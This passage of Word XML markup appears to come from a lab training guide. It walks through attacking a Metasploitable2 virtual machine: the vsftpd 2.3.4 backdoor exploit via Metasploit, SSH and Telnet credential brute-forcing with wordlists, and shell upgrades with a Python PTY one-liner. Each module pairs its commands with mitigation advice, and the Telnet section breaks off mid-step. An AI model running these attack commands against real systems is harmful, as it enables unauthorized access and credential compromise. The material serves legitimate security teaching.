        <w:t xml:space="preserve">Confirm port 21 is open and running vsftpd 2.3.4, then search for a matching public exploit.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searchsploit vsftpd 2.3.4</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Launch the Metasploit Framework console.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tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search the module database for the vsftpd 2.3.4 backdoor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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the returned backdoor exploit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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the required and optional module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Set the target IP address as the remote host.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192.168.228.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch the exploit.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Once the session returns a raw shell, upgrade it to a fully interactive TTY for easier command execution.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python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm privilege level (expect root, i.e. uid=0) and begin standard post-exploitation enumeration as appropriate for the training objective.</w:t>
      </w:r>
    </w:p>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ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Display attacker host network interfaces and IP address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netdiscover -r &lt;subnet&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Discover live hosts on the local subnet via ARP</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nmap -sV -O -T4 -sS &lt;target&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Service/version detection, OS fingerprinting, SYN scan</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searchsploit vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Search local Exploit-DB mirror for matching public exploits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msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Launch the Metasploit Framework interactive console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 vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Search Metasploit's module database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use 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Select a module from the search results by index</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show options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">List required/optional parameters for the selected module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rhosts &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure the target IP address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exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Execute the selected module against the configured target</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python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Upgrade a raw/limited shell to an interactive TTY</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Never install software from unverified or unofficial mirrors; always validate package checksums/signatures against the vendor's published hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade vsftpd to a current, patched release and remove or disable the vulnerable 2.3.4 build entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable anonymous and plaintext FTP; replace with SFTP/FTPS to enforce encryption in transit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict FTP service exposure with host-based and network firewalls; do not expose FTP to untrusted networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy intrusion detection signatures for known backdoor command patterns and monitor for unexpected listeners (e.g., port 6200).</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How a supply-chain compromise of a widely used open-source package can introduce a persistent, unauthenticated backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Metasploit module workflow: search → use → show options → set → exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Why shell stabilization (PTY upgrade) is a standard, necessary post-exploitation step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId11"/>
          <w:footerReference w:type="default" r:id="rId12"/>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2: SSH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OpenSSH 4.7p1</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TCP/22</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Weak/default credential exposure — exploited via Metasploit ssh_login brute-force auxiliary module</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High — remote credential compromise leading to shell access</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SSH (Secure Shell) provides encrypted remote administration and file transfer, typically on port 22. While the protocol itself is cryptographically sound, weak, default, or reused credentials remain one of the most common real-world attack vectors against SSH services, including on Metasploitable2, which ships with several weak default accounts.</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Rather than exploiting a flaw in the SSH protocol or the OpenSSH 4.7p1 binary directly, this module demonstrates credential-based compromise: Metasploit's auxiliary/scanner/ssh/ssh_login module performs an automated login attempt using supplied username and password wordlists, and reports (or opens a session for) any valid combination found.</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Identify the attacker's own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ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover the target IP address via netdiscover.</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netdiscover -r 192.168.228.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run an Nmap service/version scan to confirm the OpenSSH version and other open ports.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192.168.228.130 192.168.228.254</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search Exploit-DB for any version-specific OpenSSH issues for reference.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searchsploit OpenSSH 4.7p1</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Launch the Metasploit Framework console.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tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for SSH-related modules and identify the SSH login brute-force module (module index 78 in this walkthrough).</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ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the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78</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Review required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Set the target host.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192.168.228.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Point the module at prepared username and password wordlists.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PASS_FILE /home/kali/pass.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">set USER_FILE /home/kali/user.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the module to stop after the first successful login and to report progress verbosely.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STOP_ON_SUCCESS true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="3DDC84"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">set VERBOSE true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the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Once valid credentials are found, Metasploit automatically opens a session. List active sessions.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sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Interact with the established session.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sessions -i 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade the resulting shell to a fully interactive TTY.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python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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ifconfig / netdiscover / nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Standard host discovery and enumeration (see Module 1)</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searchsploit OpenSSH 4.7p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference lookup for version-specific issues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ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Locate SSH-related Metasploit modules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use 78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Select the ssh_login auxiliary module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PASS_FILE / USER_FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Provide credential wordlists for brute-forcing</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set STOP_ON_SUCCESS true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Halt the module as soon as valid credentials are found</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show sessions / sessions -i &lt;n&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">List and interact with opened Metasploit sessions</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Eliminate default and weak credentials on all accounts; enforce a strong password policy or, preferably, key-based authentication only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable password authentication for SSH entirely where feasible (PasswordAuthentication no) and use public-key authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement account lockout, rate limiting, or fail2ban-style protections against repeated failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict SSH access to known management networks via firewall rules or a bastion/jump host, and disable direct root login (PermitRootLogin no).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep OpenSSH patched to a current release and monitor authentication logs for brute-force patterns.</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Why credential hygiene is often a bigger real-world risk than protocol-level vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How to configure and run a Metasploit auxiliary brute-force module with external wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The session management workflow (show sessions / sessions -i) used across Metasploit modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId13"/>
          <w:footerReference w:type="default" r:id="rId14"/>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3: Telnet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Telnet (telnetd)</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TCP/23</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Plaintext credential exposure — exploited via Metasploit telnet_login brute-force auxiliary module</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High — unencrypted credential transmission and remote command-line access</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Telnet provides remote command-line access to networked devices but, unlike SSH, transmits all data — including usernames and passwords — in plaintext. This makes it trivially vulnerable to network interception as well as to credential brute-forcing, both of which are demonstrated in this module against Metasploitable2's Telnet service.</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Because Telnet offers no transport encryption, any attacker positioned on the network path (or, as demonstrated here, performing an online brute-force attack) can obtain valid login credentials and subsequently open an interactive command-line session with the target exactly as a legitimate administrator would.</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Identify the attacker's own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ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Discover the target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netdiscover -r 192.168.228.0/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan for open ports and confirm Telnet (port 23) is exposed.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192.168.228.130 192.168.228.254</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Launch Metasploit.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tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search for Telnet-related modules and identify the Telnet login brute-force module (module index 72 in this walkthrough).</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telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
